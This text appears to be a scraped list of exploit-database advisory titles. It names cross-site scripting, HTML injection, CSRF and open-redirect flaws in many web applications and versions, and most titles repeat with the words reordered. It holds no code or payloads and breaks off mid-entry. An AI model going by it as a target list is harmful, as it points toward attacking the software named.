SQL-PHP - Cross-Site Scripting Multiple Vulnerabilities SimpleNotes - Multiple Cross-Site Scripting Vulnerabilities SimpleNotes - Cross-Site Scripting Multiple Vulnerabilities PEGames - Multiple Cross-Site Scripting Vulnerabilities PEGames - Cross-Site Scripting Multiple Vulnerabilities Pluck CMS 4.5.2 - Multiple Cross-Site Scripting Vulnerabilities Pluck CMS 4.5.2 - Cross-Site Scripting Multiple Vulnerabilities Quate CMS 0.3.4 - Multiple Cross-Site Scripting Vulnerabilities Quate CMS 0.3.4 - Cross-Site Scripting Multiple Vulnerabilities Ubee EVW3200 - Multiple Persistent Cross-Site Scripting Vulnerabilities Ubee EVW3200 - Persistent Cross-Site Scripting Multiple Vulnerabilities TimeTrex Time 2.2 and Attendance Module - Multiple Cross-Site Scripting Vulnerabilities Accellion File Transfer - Multiple Cross-Site Scripting Vulnerabilities TimeTrex Time 2.2 and Attendance Module - Cross-Site Scripting Multiple Vulnerabilities Accellion File Transfer - Cross-Site Scripting Multiple Vulnerabilities vTiger CRM 5.0.4 - Multiple Cross-Site Scripting Vulnerabilities vTiger CRM 5.0.4 - Cross-Site Scripting Multiple Vulnerabilities @Mail 5.42 and @Mail WebMail 5.0.5 - Multiple Cross-Site Scripting Vulnerabilities @Mail 5.42 and @Mail WebMail 5.0.5 - Cross-Site Scripting Multiple Vulnerabilities Silentum LoginSys 1.0 - Multiple Cross-Site Scripting Vulnerabilities Silentum LoginSys 1.0 - Cross-Site Scripting Multiple Vulnerabilities Gallery 2.0 - Multiple Cross-Site Scripting Vulnerabilities Gallery 2.0 - Cross-Site Scripting Multiple Vulnerabilities Paranews 3.4 - Multiple Cross-Site Scripting Vulnerabilities Paranews 3.4 - Cross-Site Scripting Multiple Vulnerabilities Flatpress 0.804 - Multiple Cross-Site Scripting Vulnerabilities Flatpress 0.804 - Cross-Site Scripting Multiple Vulnerabilities Membership Script - Multiple Cross-Site Scripting Vulnerabilities Membership Script - Cross-Site Scripting Multiple Vulnerabilities Celoxis - Multiple Cross-Site Scripting Vulnerabilities Celoxis - Cross-Site Scripting Multiple Vulnerabilities WikyBlog 1.7.1 - Multiple Cross-Site Scripting Vulnerabilities WikyBlog 1.7.1 - Cross-Site Scripting Multiple Vulnerabilities UC Gateway Investment SiteEngine 5.0 - 'api.php' URI redirection UC Gateway Investment SiteEngine 5.0 - 'api.php' Open Redirection KKE Info Media Kmita Gallery - Multiple Cross-Site Scripting Vulnerabilities KKE Info Media Kmita Gallery - Cross-Site Scripting Multiple Vulnerabilities Venalsur Booking Centre 2.01 - Multiple Cross-Site Scripting Vulnerabilities Venalsur Booking Centre 2.01 - Cross-Site Scripting Multiple Vulnerabilities CMS Made Simple 1.11.10 - Multiple Cross-Site Scripting Vulnerabilities CMS Made Simple 1.11.10 - Cross-Site Scripting Multiple Vulnerabilities Autonomy Ultraseek - 'cs.html' URI redirection Autonomy Ultraseek - 'cs.html' Open Redirection E-PHP B2B Trading Marketplace Script - Multiple Cross-Site Scripting Vulnerabilities E-PHP B2B Trading Marketplace Script - Cross-Site Scripting Multiple Vulnerabilities Yektaweb Academic Web Tools CMS 1.4.2.8/1.5.7 - Multiple Cross-Site Scripting Vulnerabilities Yektaweb Academic Web Tools CMS 1.4.2.8/1.5.7 - Cross-Site Scripting Multiple Vulnerabilities Verlihub Control Panel 1.7 - Multiple Cross-Site Scripting Vulnerabilities Verlihub Control Panel 1.7 - Cross-Site Scripting Multiple Vulnerabilities Achievo 1.3.4 - Multiple Cross-Site Scripting Vulnerabilities Achievo 1.3.4 - Cross-Site Scripting Multiple Vulnerabilities Webmedia Explorer 5.0.9/5.10 - Multiple Cross-Site Scripting Vulnerabilities Webmedia Explorer 5.0.9/5.10 - Cross-Site Scripting Multiple Vulnerabilities XZeroScripts XZero Community Classifieds 4.97.8 - Multiple Cross-Site Scripting Vulnerabilities XZeroScripts XZero Community Classifieds 4.97.8 - Cross-Site Scripting Multiple Vulnerabilities Joomla! Component com_user - 'view' URI Redirection Joomla! Component com_user - 'view' Open Redirection Miniweb 2.0 Site Builder Module - Multiple Cross-Site Scripting Vulnerabilities Miniweb 2.0 Site Builder Module - Cross-Site Scripting Multiple Vulnerabilities Censura < 2.1.1 - Multiple Cross-Site Scripting Vulnerabilities Censura < 2.1.1 - Cross-Site Scripting Multiple Vulnerabilities McAfee Network Security Manager 5.1.7 - Multiple Cross-Site Scripting Vulnerabilities McAfee Network Security Manager 5.1.7 - Cross-Site Scripting Multiple Vulnerabilities OpenFiler 2.99.1 - Multiple Persistent Cross-Site Scripting Vulnerabilities OpenFiler 2.99.1 - Persistent Cross-Site Scripting Multiple Vulnerabilities AfterLogic WebMail Pro 4.7.10 - Multiple Cross-Site Scripting Vulnerabilities AfterLogic WebMail Pro 4.7.10 - Cross-Site Scripting Multiple Vulnerabilities WordPress Plugin Subscribe to Comments 2.0 - Multiple Cross-Site Scripting Vulnerabilities WordPress Plugin Subscribe to Comments 2.0 - Cross-Site Scripting Multiple Vulnerabilities phpMyFAQ < 2.5.4 - Multiple Cross-Site Scripting Vulnerabilities phpMyFAQ < 2.5.4 - Cross-Site Scripting Multiple Vulnerabilities Binatone DT 850W Wireless Router - Multiple Cross-Site Request Forgery Vulnerabilities Binatone DT 850W Wireless Router - Cross-Site Request Forgery Multiple Vulnerabilities Discuz! 2.0 - Multiple Cross-Site Scripting Vulnerabilities Discuz! 2.0 - Cross-Site Scripting Multiple Vulnerabilities @lex Guestbook 5.0 - Multiple Cross-Site Scripting Vulnerabilities @lex Guestbook 5.0 - Cross-Site Scripting Multiple Vulnerabilities Mayan-EDms web-based document management OS system - Multiple Persistent Cross-Site Scripting Vulnerabilities Mayan-EDms web-based document management OS system - Persistent Cross-Site Scripting Multiple Vulnerabilities Joomla! Component EasyBook 2.0.0rc4 - Multiple HTML Injection Vulnerabilities Joomla! Component EasyBook 2.0.0rc4 - HTML Injection Multiple Vulnerabilities KnowGate hipergate 4.0.12 - Multiple Cross-Site Scripting Vulnerabilities KnowGate hipergate 4.0.12 - Cross-Site Scripting Multiple Vulnerabilities vBulletin 3.5.4 - Multiple Cross-Site Scripting Vulnerabilities vBulletin 3.5.4 - Cross-Site Scripting Multiple Vulnerabilities Portrait Software Portrait Campaign Manager 4.6.1.22 - Multiple Cross-Site Scripting Vulnerabilities Portrait Software Portrait Campaign Manager 4.6.1.22 - Cross-Site Scripting Multiple Vulnerabilities vBulletin 4.0.2 - Multiple Cross-Site Scripting Vulnerabilities vBulletin 4.0.2 - Cross-Site Scripting Multiple Vulnerabilities Sparta Systems TrackWise EQms - Multiple Cross-Site Scripting Vulnerabilities Sparta Systems TrackWise EQms - Cross-Site Scripting Multiple Vulnerabilities PHPWind 6.0 - Multiple Cross-Site Scripting Vulnerabilities PHPWind 6.0 - Cross-Site Scripting Multiple Vulnerabilities SpringSource (Multiple Products) - Multiple HTML Injection Vulnerabilities SpringSource (Multiple Products) - HTML Injection Multiple Vulnerabilities Chipmunk NewsLetter 2.0 - Multiple Cross-Site Scripting Vulnerabilities Chipmunk NewsLetter 2.0 - Cross-Site Scripting Multiple Vulnerabilities Datetopia Match Agency BiZ - Multiple Cross-Site Scripting Vulnerabilities Datetopia Match Agency BiZ - Cross-Site Scripting Multiple Vulnerabilities Bilboplanet 2.0 - Multiple Cross-Site Scripting Vulnerabilities Bilboplanet 2.0 - Cross-Site Scripting Multiple Vulnerabilities Hitmaaan Gallery 1.3 - Multiple Cross-Site Scripting Vulnerabilities Hitmaaan Gallery 1.3 - Cross-Site Scripting Multiple Vulnerabilities Ez Poll Hoster - Multiple Cross-Site Scripting Vulnerabilities Ez Poll Hoster - Cross-Site Scripting Multiple Vulnerabilities LiveZilla 3.1.8.3 - Multiple Cross-Site Scripting Vulnerabilities LiveZilla 3.1.8.3 - Cross-Site Scripting Multiple Vulnerabilities Worxware DCP-Portal 7.0 - Multiple Cross-Site Scripting Vulnerabilities Worxware DCP-Portal 7.0 - Cross-Site Scripting Multiple Vulnerabilities phpFaber CMS 2.0.5 - Multiple Cross-Site Scripting Vulnerabilities phpFaber CMS 2.0.5 - Cross-Site Scripting Multiple Vulnerabilities SimpNews 2.47.3 - Multiple Cross-Site Scripting Vulnerabilities SimpNews 2.47.3 - Cross-Site Scripting Multiple Vulnerabilities eliteCMS 1.01 - Multiple Cross-Site Scripting Vulnerabilities eliteCMS 1.01 - Cross-Site Scripting Multiple Vulnerabilities WordPress Plugin Firestats 1.6.5 - Multiple Cross-Site Scripting Vulnerabilities WordPress Plugin Firestats 1.6.5 - Cross-Site Scripting Multiple Vulnerabilities Diem 5.1.2 - Multiple Cross-Site Scripting Vulnerabilities Diem 5.1.2 - Cross-Site Scripting Multiple Vulnerabilities Claus Muus Spitfire 1.0.336 - Multiple Cross-Site Scripting Vulnerabilities Claus Muus Spitfire 1.0.336 - Cross-Site Scripting Multiple Vulnerabilities SyndeoCMS 2.9 - Multiple HTML Injection Vulnerabilities SyndeoCMS 2.9 - HTML Injection Multiple Vulnerabilities Sourcefabric Campsite - Multiple Cross-Site Scripting Vulnerabilities Sourcefabric Campsite - Cross-Site Scripting Multiple Vulnerabilities FuseTalk 3.2/4.0 - Multiple Cross-Site Scripting Vulnerabilities FuseTalk 3.2/4.0 - Cross-Site Scripting Multiple Vulnerabilities PHP Stock Management System 1.02 - Multiple Persistent Cross-Site Scripting Vulnerabilities PHP Stock Management System 1.02 - Persistent Cross-Site Scripting Multiple Vulnerabilities Hulihan Applications Amethyst 0.1.5 - Multiple HTML Injection Vulnerabilities Muraus Open Blog - Multiple HTML Injection Vulnerabilities Hulihan Applications Amethyst 0.1.5 - HTML Injection Multiple Vulnerabilities Muraus Open Blog - HTML Injection Multiple Vulnerabilities WordPress Plugin WooCommerce Store Exporter 1.7.5 - Multiple Cross-Site Scripting Vulnerabilities WordPress Plugin WooCommerce Store Exporter 1.7.5 - Cross-Site Scripting Multiple Vulnerabilities Preation Eden Platform 27.7.2010 - Multiple HTML Injection Vulnerabilities Preation Eden Platform 27.7.2010 - HTML Injection Multiple Vulnerabilities Mystic 0.1.4 - Multiple Cross-Site Scripting Vulnerabilities Onyx - Multiple Cross-Site Scripting Vulnerabilities Mystic 0.1.4 - Cross-Site Scripting Multiple Vulnerabilities Onyx - Cross-Site Scripting Multiple Vulnerabilities Online Work Order Suite Lite Edition - Multiple Cross-Site Scripting Vulnerabilities Online Work Order Suite Lite Edition - Cross-Site Scripting Multiple Vulnerabilities Valarsoft WebMatic 3.0.5 - Multiple HTML Injection Vulnerabilities Valarsoft WebMatic 3.0.5 - HTML Injection Multiple Vulnerabilities Amiro.CMS 5.8.4.0 - Multiple HTML Injection Vulnerabilities Amiro.CMS 5.8.4.0 - HTML Injection Multiple Vulnerabilities StatsCode - Multiple Cross-Site Scripting Vulnerabilities StatsCode - Cross-Site Scripting Multiple Vulnerabilities e-Soft24 Jokes Portal Script Seo 1.0 - Multiple Cross-Site Scripting Vulnerabilities e-Soft24 Jokes Portal Script Seo 1.0 - Cross-Site Scripting Multiple Vulnerabilities Open Classifieds - Multiple Cross-Site Scripting Vulnerabilities Open Classifieds - Cross-Site Scripting Multiple Vulnerabilities OpenText LiveLink 9.7.1 - Multiple Cross-Site Scripting Vulnerabilities OpenText LiveLink 9.7.1 - Cross-Site Scripting Multiple Vulnerabilities Micro CMS 1.0 - 'name' HTML Injection Micro CMS 1.0 - 'name' HTML Injection (1) eCardMAX - Multiple Cross-Site Scripting Vulnerabilities eCardMAX - Cross-Site Scripting Multiple Vulnerabilities Ronny CMS 1.1 r935 - Multiple HTML Injection Vulnerabilities Ronny CMS 1.1 r935 - HTML Injection Multiple Vulnerabilities eXV2 CMS - Multiple Cross-Site Scripting Vulnerabilities eXV2 CMS - Cross-Site Scripting Multiple Vulnerabilities Wiccle Web Builder 2.0 - Multiple Cross-Site Scripting Vulnerabilities Micro CMS 1.0 - 'name' HTML Injection Wiccle Web Builder 2.0 - Cross-Site Scripting Multiple Vulnerabilities Micro CMS 1.0 - 'name' HTML Injection (2) Flatnux 2009-03-27 - Multiple Cross-Site Scripting Vulnerabilities Flatnux 2009-03-27 - Cross-Site Scripting Multiple Vulnerabilities Elastix 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities Elastix 2.0.2 - Cross-Site Scripting Multiple Vulnerabilities Croogo 2.0.0 - Multiple Persistent Cross-Site Scripting Vulnerabilities Croogo 2.0.0 - Persistent Cross-Site Scripting Multiple Vulnerabilities Change CMS 3.6.8 - Multiple Cross-Site Request Forgery Vulnerabilities Change CMS 3.6.8 - Cross-Site Request Forgery Multiple Vulnerabilities OpenWrt 10.03 - Multiple Cross-Site Scripting Vulnerabilities OpenWrt 10.03 - Cross-Site Scripting Multiple Vulnerabilities Contenido CMS 4.8.12 - Multiple Cross-Site Scripting Vulnerabilities Contenido CMS 4.8.12 - Cross-Site Scripting Multiple Vulnerabilities SolarWinds Orion Network Performance Monitor (NPM) 10.1 - Multiple Cross-Site Scripting Vulnerabilities SolarWinds Orion Network Performance Monitor (NPM) 10.1 - Cross-Site Scripting Multiple Vulnerabilities ManageEngine EventLog Analyzer 6.1 - Multiple Cross-Site Scripting Vulnerabilities ManageEngine EventLog Analyzer 6.1 - Cross-Site Scripting Multiple Vulnerabilities Joomla! Component com_mailto - Multiple Cross-Site Scripting Vulnerabilities Joomla! Component com_mailto - Cross-Site Scripting Multiple Vulnerabilities Mura CMS - Multiple Cross-Site Scripting Vulnerabilities Mura CMS - Cross-Site Scripting Multiple Vulnerabilities BlogCFC 5.9.6.001 - Multiple Cross-Site Scripting Vulnerabilities BlogCFC 5.9.6.001 - Cross-Site Scripting Multiple Vulnerabilities Radius Manager 3.6 - Multiple Cross-Site Scripting Vulnerabilities Social Share - Multiple Cross-Site Scripting Vulnerabilities Radius Manager 3.6 - Cross-Site Scripting Multiple Vulnerabilities Social Share - Cross-Site Scripting Multiple Vulnerabilities Habari 0.6.5 - Multiple Cross-Site Scripting Vulnerabilities Habari 0.6.5 - Cross-Site Scripting Multiple Vulnerabilities Openfire 3.6.4 - Multiple Cross-Site Scripting Vulnerabilities Openfire 3.6.4 - Cross-Site Scripting Multiple Vulnerabilities phpSound Music Sharing Platform 1.0.5 - Multiple Cross-Site Scripting Vulnerabilities phpSound Music Sharing Platform 1.0.5 - Cross-Site Scripting Multiple Vulnerabilities vBSEO 3.2.2/3.5.2 - Multiple Cross-Site Scripting Vulnerabilities vBSEO 3.2.2/3.5.2 - Cross-Site Scripting Multiple Vulnerabilities ViArt Shop 4.0.5 - Multiple Cross-Site Scripting Vulnerabilities ViArt Shop 4.0.5 - Cross-Site Scripting Multiple Vulnerabilities CiviCRM 3.3.3 - Multiple Cross-Site Scripting Vulnerabilities UMI CMS 2.8.1.2 - Multiple Cross-Site Scripting Vulnerabilities CiviCRM 3.3.3 - Cross-Site Scripting Multiple Vulnerabilities UMI CMS 2.8.1.2 - Cross-Site Scripting Multiple Vulnerabilities Dolphin 7.0.4 - Multiple Cross-Site Scripting Vulnerabilities Dolphin 7.0.4 - Cross-Site Scripting Multiple Vulnerabilities MG2 0.5.1 - Multiple Cross-Site Scripting Vulnerabilities Gollos 2.8 - Multiple Cross-Site Scripting Vulnerabilities MG2 0.5.1 - Cross-Site Scripting Multiple Vulnerabilities Gollos 2.8 - Cross-Site Scripting Multiple Vulnerabilities Photopad 1.2 - Multiple Cross-Site Scripting Vulnerabilities Photopad 1.2 - Cross-Site Scripting Multiple Vulnerabilities Support Incident Tracker (SiT!) 3.62 - Multiple Cross-Site Scripting Vulnerabilities Support Incident Tracker (SiT!) 3.62 - Cross-Site Scripting Multiple Vulnerabilities Pragyan CMS 3.0 Beta - Multiple Cross-Site Scripting Vulnerabilities Pragyan CMS 3.0 Beta - Cross-Site Scripting Multiple Vulnerabilities WordPress Plugin Sodahead Polls 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities WordPress Plugin Rating-Widget 1.3.1 - Multiple Cross-Site Scripting Vulnerabilities XOOPS 2.x - Multiple Cross-Site Scripting Vulnerabilities WordPress Plugin Sodahead Polls 2.0.2 - Cross-Site Scripting Multiple Vulnerabilities WordPress Plugin Rating-Widget 1.3.1 - Cross-Site Scripting Multiple Vulnerabilities XOOPS 2.x - Cross-Site Scripting Multiple Vulnerabilities MC Content Manager 10.1.1 - Multiple Cross-Site Scripting Vulnerabilities GrapeCity Data Dynamics Reports 1.6.2084.14 - Multiple Cross-Site Scripting Vulnerabilities MC Content Manager 10.1.1 - Cross-Site Scripting Multiple Vulnerabilities GrapeCity Data Dynamics Reports 1.6.2084.14 - Cross-Site Scripting Multiple Vulnerabilities WordPress Plugin Daily Maui Photo Widget 0.2 - Multiple Cross-Site Scripting Vulnerabilities WordPress Plugin Daily Maui Photo Widget 0.2 - Cross-Site Scripting Multiple Vulnerabilities Kusaba X 0.9 - Multiple Cross-Site Scripting Vulnerabilities Kusaba X 0.9 - Cross-Site Scripting Multiple Vulnerabilities Humhub 0.10.0-rc.1 - Multiple Persistent Cross-Site Scripting Vulnerabilities Humhub 0.10.0-rc.1 - Persistent Cross-Site Scripting Multiple Vulnerabilities Alkacon OpenCMS 7.5.x - Multiple Cross-Site Scripting Vulnerabilities Alkacon OpenCMS 7.5.x - Cross-Site Scripting Multiple Vulnerabilities Claroline 1.10 - Multiple HTML Injection Vulnerabilities Claroline 1.10 - HTML Injection Multiple Vulnerabilities YaCOMAS 0.3.6 OpenCMS - Multiple Cross-Site Scripting Vulnerabilities YaCOMAS 0.3.6 OpenCMS - Cross-Site Scripting Multiple Vulnerabilities webSPELL 4.2.2a - Multiple Cross-Site Scripting Vulnerabilities webSPELL 4.2.2a - Cross-Site Scripting Multiple Vulnerabilities YaPiG 0.95 - Multiple Cross-Site Scripting Vulnerabilities YaPiG 0.95 - Cross-Site Scripting Multiple Vulnerabilities PHPDug 2.0 - Multiple Cross-Site Scripting Vulnerabilities PHPDug 2.0 - Cross-Site Scripting Multiple Vulnerabilities Keyfax Customer Response Management 3.2.2.6 - Multiple Cross-Site Scripting Vulnerabilities Keyfax Customer Response Management 3.2.2.6 - Cross-Site Scripting Multiple Vulnerabilities poMMo Aardvark PR16.1 - Multiple Cross-Site Scripting Vulnerabilities poMMo Aardvark PR16.1 - Cross-Site Scripting Multiple Vulnerabilities Argyle Social - Multiple Cross-Site Scripting Vulnerabilities Argyle Social - Cross-Site Scripting Multiple Vulnerabilities Mitel Audio and Web Conferencing 4.4.3.0 - Multiple Cross-Site Scripting Vulnerabilities Mitel Audio and Web Conferencing 4.4.3.0 - Cross-Site Scripting Multiple Vulnerabilities PHP Calendar Basic 2.3 - Multiple Cross-Site Scripting Vulnerabilities PHP Calendar Basic 2.3 - Cross-Site Scripting Multiple Vulnerabilities phpScheduleIt 1.2.12 - Multiple Cross-Site Scripting Vulnerabilities phpScheduleIt 1.2.12 - Cross-Site Scripting Multiple Vulnerabilities Blog:CMS 4.2 - Multiple Cross-Site Scripting Vulnerabilities Blog:CMS 4.2 - Cross-Site Scripting Multiple Vulnerabilities miniblog 1.0 - Multiple Cross-Site Scripting Vulnerabilities miniblog 1.0 - Cross-Site Scripting Multiple Vulnerabilities Mambo 4.6.x - Multiple Cross-Site Scripting Vulnerabilities Mambo 4.6.x - Cross-Site Scripting Multiple Vulnerabilities Joomla! 1.6.3 - Multiple Cross-Site Scripting Vulnerabilities Flatpress 0.1010.1 - Multiple Cross-Site Scripting Vulnerabilities Joomla! 1.6.3 - Cross-Site Scripting Multiple Vulnerabilities Flatpress 0.1010.1 - Cross-Site Scripting Multiple Vulnerabilities MBoard 1.3 - 'url' URI Redirection PHPJunkYard GBook 1.6/1.7 - Multiple Cross-Site Scripting Vulnerabilities MBoard 1.3 - 'url' Open Redirection PHPJunkYard GBook 1.6/1.7 - Cross-Site Scripting Multiple Vulnerabilities TCExam 11.2.x - Multiple Cross-Site Scripting Vulnerabilities TCExam 11.2.x - Cross-Site Scripting Multiple Vulnerabilities WordPress Plugin bSuite 4.0.7 - Multiple HTML Injection Vulnerabilities WordPress Plugin bSuite 4.0.7 - HTML Injection Multiple Vulnerabilities Joomla! < 1.6.5 - Multiple Cross-Site Scripting Vulnerabilities Joomla! < 1.6.5 - Cross-Site Scripting Multiple Vulnerabilities Cyberoam UTM - Multiple Cross-Site Scripting Vulnerabilities Cyberoam UTM - Cross-Site Scripting Multiple Vulnerabilities Online Grades 3.2.5 - Multiple Cross-Site Scripting Vulnerabilities Online Grades 3.2.5 - Cross-Site Scripting Multiple Vulnerabilities Sitecore CMS 6.4.1 - 'url' URI Redirection Sitecore CMS 6.4.1 - 'url' Open Redirection Curverider Elgg 1.7.9 - Multiple Cross-Site Scripting Vulnerabilities Curverider Elgg 1.7.9 - Cross-Site Scripting Multiple Vulnerabilities HESK 2.2 - Multiple Cross-Site Scripting Vulnerabilities HESK 2.2 - Cross-Site Scripting Multiple Vulnerabilities Exponent CMS 2.3.1 - Multiple Cross-Site Scripting Vulnerabilities Exponent CMS 2.3.1 - Cross-Site Scripting Multiple Vulnerabilities Softbiz Recipes Portal Script - Multiple Cross-Site Scripting Vulnerabilities Softbiz Recipes Portal Script - Cross-Site Scripting Multiple Vulnerabilities OpenEMR 4.0 - Multiple Cross-Site Scripting Vulnerabilities OpenEMR 4.0 - Cross-Site Scripting Multiple Vulnerabilities WordPress Plugin eShop 6.2.8 - Multiple Cross-Site Scripting Vulnerabilities WordPress Plugin eShop 6.2.8 - Cross-Site Scripting Multiple Vulnerabilities WordPress Plugin WP-Stats-Dashboard 2.6.5.1 - Multiple Cross-Site Scripting Vulnerabilities WordPress Plugin WP-Stats-Dashboard 2.6.5.1 - Cross-Site Scripting Multiple Vulnerabilities Open Classifieds 1.7.2 - Multiple Cross-Site Scripting Vulnerabilities Open Classifieds 1.7.2 - Cross-Site Scripting Multiple Vulnerabilities IBM Open Admin Tool 2.71 - Multiple Cross-Site Scripting Vulnerabilities IBM Open Admin Tool 2.71 - Cross-Site Scripting Multiple Vulnerabilities GuppY CMS 5.0.9 < 5.00.10 - Multiple Cross-Site Request Forgery Vulnerabilities GuppY CMS 5.0.9 < 5.00.10 - Cross-Site Request Forgery Multiple Vulnerabilities Papoo CMS Light 4.0 - Multiple Cross-Site Scripting Vulnerabilities Papoo CMS Light 4.0 - Cross-Site Scripting Multiple Vulnerabilities Microsoft SharePoint 2007/2010 - 'Source' Multiple URI Open redirection Vulnerabilities Microsoft SharePoint 2007/2010 - 'Source' Multiple Open Redirections PunBB 1.3.5 - Multiple Cross-Site Scripting Vulnerabilities PunBB 1.3.5 - Cross-Site Scripting Multiple Vulnerabilities Zyncro 3.0.1.20 - Multiple HTML Injection Vulnerabilities Zyncro 3.0.1.20 - HTML Injection Multiple Vulnerabilities Adobe ColdFusion 7 - Multiple Cross-Site Scripting Vulnerabilities Adobe ColdFusion 7 - Cross-Site Scripting Multiple Vulnerabilities Joomla! < 1.7.0 - Multiple Cross-Site Scripting Vulnerabilities Bitweaver 2.8.1 - Multiple Cross-Site Scripting Vulnerabilities Joomla! < 1.7.0 - Cross-Site Scripting Multiple Vulnerabilities Bitweaver 2.8.1 - Cross-Site Scripting Multiple Vulnerabilities vTiger CRM 5.2.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities vTiger CRM 5.2.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities (1) Silverstripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities Silverstripe CMS 2.4.5 - Cross-Site Scripting Multiple Vulnerabilities BugFree 2.1.3 - Multiple Cross-Site Scripting Vulnerabilities BugFree 2.1.3 - Cross-Site Scripting Multiple Vulnerabilities WordPress Plugin Pretty Link 1.4.56 - Multiple Cross-Site Scripting Vulnerabilities WordPress Plugin Pretty Link 1.4.56 - Cross-Site Scripting Multiple Vulnerabilities Tine 2.0 - Multiple Cross-Site Scripting Vulnerabilities Tine 2.0 - Cross-Site Scripting Multiple Vulnerabilities InverseFlow 2.4 - Multiple Cross-Site Scripting Vulnerabilities InverseFlow 2.4 - Cross-Site Scripting Multiple Vulnerabilities vTiger CRM 5.2.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities vTiger CRM 5.2.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities (2) eFront 3.6.10 Build 11944 - Multiple Cross-Site Scripting Vulnerabilities eFront 3.6.10 Build 11944 - Cross-Site Scripting Multiple Vulnerabilities CmyDocument - Multiple Cross-Site Scripting Vulnerabilities CmyDocument - Cross-Site Scripting Multiple Vulnerabilities AShop - Open-redirection / Cross-Site Scripting Joomla! Component com_alfcontact 1.9.3 - Multiple Cross-Site Scripting Vulnerabilities AShop - Open Redirection / Cross-Site Scripting Joomla! Component com_alfcontact 1.9.3 - Cross-Site Scripting Multiple Vulnerabilities PrestaShop 1.4.4.1 mondialrelay (kit_mondialrelay) - Multiple Cross-Site Scripting Vulnerabilities PrestaShop 1.4.4.1 mondialrelay (kit_mondialrelay) - Cross-Site Scripting Multiple Vulnerabilities Zen Cart CMS 1.3.9h - Multiple Cross-Site Scripting Vulnerabilities Zen Cart CMS 1.3.9h - Cross-Site Scripting Multiple Vulnerabilities eSyndiCat Pro 2.3.5 - Multiple Cross-Site Scripting Vulnerabilities eSyndiCat Pro 2.3.5 - Cross-Site Scripting Multiple Vulnerabilities Fork CMS 3.1.5 - Multiple Cross-Site Scripting Vulnerabilities Pulse Pro 1.7.2 - Multiple Cross-Site Scripting Vulnerabilities Fork CMS 3.1.5 - Cross-Site Scripting Multiple Vulnerabilities Pulse Pro 1.7.2 - Cross-Site Scripting Multiple Vulnerabilities epesi BIM 1.2 rev 8154 - Multiple Cross-Site Scripting Vulnerabilities epesi BIM 1.2 rev 8154 - Cross-Site Scripting Multiple Vulnerabilities Orchard 1.3.9 - 'ReturnUrl' URI Redirection Orchard 1.3.9 - 'ReturnUrl' Open Redirection WordPress Plugin Age Verification 0.4 - 'redirect_to' URI Redirection WordPress Plugin Age Verification 0.4 - 'redirect_to' Open Redirection KnowledgeTree 3.x - Multiple Cross-Site Scripting Vulnerabilities KnowledgeTree 3.x - Cross-Site Scripting Multiple Vulnerabilities ATutor 2.0.3 - Multiple Cross-Site Scripting Vulnerabilities Beehive Forum 101 - Multiple Cross-Site Scripting Vulnerabilities phpVideoPro 0.8.x/0.9.7 - Multiple Cross-Site Scripting Vulnerabilities ATutor 2.0.3 - Cross-Site Scripting Multiple Vulnerabilities Beehive Forum 101 - Cross-Site Scripting Multiple Vulnerabilities phpVideoPro 0.8.x/0.9.7 - Cross-Site Scripting Multiple Vulnerabilities Acidcat ASP CMS 3.5 - Multiple Cross-Site Scripting Vulnerabilities Acidcat ASP CMS 3.5 - Cross-Site Scripting Multiple Vulnerabilities WordPress Plugin Video Gallery 2.8 - Multiple Cross-Site Request Forgery Vulnerabilities WordPress Plugin Video Gallery 2.8 - Cross-Site Request Forgery Multiple Vulnerabilities GForge 5.7.1 - Multiple Cross-Site Scripting Vulnerabilities GForge 5.7.1 - Cross-Site Scripting Multiple Vulnerabilities LxCenter Kloxo 6.1.10 - Multiple HTML Injection Vulnerabilities LxCenter Kloxo 6.1.10 - HTML Injection Multiple Vulnerabilities Tiki Wiki CMS Groupware - 'url' URI Redirection Tiki Wiki CMS Groupware - 'url' Open Redirection F*EX 20100208/20111129-2 - Multiple Cross-Site Scripting Vulnerabilities F*EX 20100208/20111129-2 - Cross-Site Scripting Multiple Vulnerabilities Webglimpse 2.x - Multiple Cross-Site Scripting Vulnerabilities Webglimpse 2.x - Cross-Site Scripting Multiple Vulnerabilities OSQA's CMS - Multiple HTML Injection Vulnerabilities OSQA's CMS - HTML Injection Multiple Vulnerabilities Matthew1471 BlogX - Multiple Cross-Site Scripting Vulnerabilities Matthew1471 BlogX - Cross-Site Scripting Multiple Vulnerabilities WordPress Plugin Uploadify Integration 0.9.6 - Multiple Cross-Site Scripting Vulnerabilities WordPress Plugin Uploadify Integration 0.9.6 - Cross-Site Scripting Multiple Vulnerabilities Joomla! Plugin Beatz 1.1 - Multiple Cross-Site Scripting Vulnerabilities Joomla! Plugin Beatz 1.1 - Cross-Site Scripting Multiple Vulnerabilities WordPress Plugin Yahoo Answer - Multiple Cross-Site Scripting Vulnerabilities WordPress Plugin Yahoo Answer - Cross-Site Scripting Multiple Vulnerabilities Croogo CMS 1.3.4 - Multiple HTML Injection Vulnerabilities Croogo CMS 1.3.4 - HTML Injection Multiple Vulnerabilities WordPress Plugin PDF & Print Button Joliprint 1.3.0 - Multiple Cross-Site Scripting Vulnerabilities WordPress Plugin PDF & Print Button Joliprint 1.3.0 - Cross-Site Scripting Multiple Vulnerabilities WordPress Plugin 2 Click Social Media Buttons 0.32.2 - Multiple Cross-Site Scripting Vulnerabilities WordPress Plugin 2 Click Social Media Buttons 0.32.2 - Cross-Site Scripting Multiple Vulnerabilities WordPress Plugin NewsLetter Manager 1.0 - Multiple Cross-Site Scripting Vulnerabilities WordPress Plugin NewsLetter Manager 1.0 - Cross-Site Scripting Multiple Vulnerabilities WordPress Plugin Media Library Categories - Multiple Cross-Site Scripting Vulnerabilities WordPress Plugin LeagueManager 3.7 - Multiple Cross-Site Scripting Vulnerabilities WordPress Plugin Media Library Categories - Cross-Site Scripting Multiple Vulnerabilities WordPress Plugin LeagueManager 3.7 - Cross-Site Scripting Multiple Vulnerabilities PHP Address Book 7.0 - Multiple Cross-Site Scripting Vulnerabilities PHP Address Book 7.0 - Cross-Site Scripting Multiple Vulnerabilities Opsview 4.6.2 - Multiple Cross-Site Scripting Vulnerabilities Opsview 4.6.2 - Cross-Site Scripting Multiple Vulnerabilities SPIP 2.x - Multiple Cross-Site Scripting Vulnerabilities SPIP 2.x - Cross-Site Scripting Multiple Vulnerabilities TEMENOS T24 - Multiple 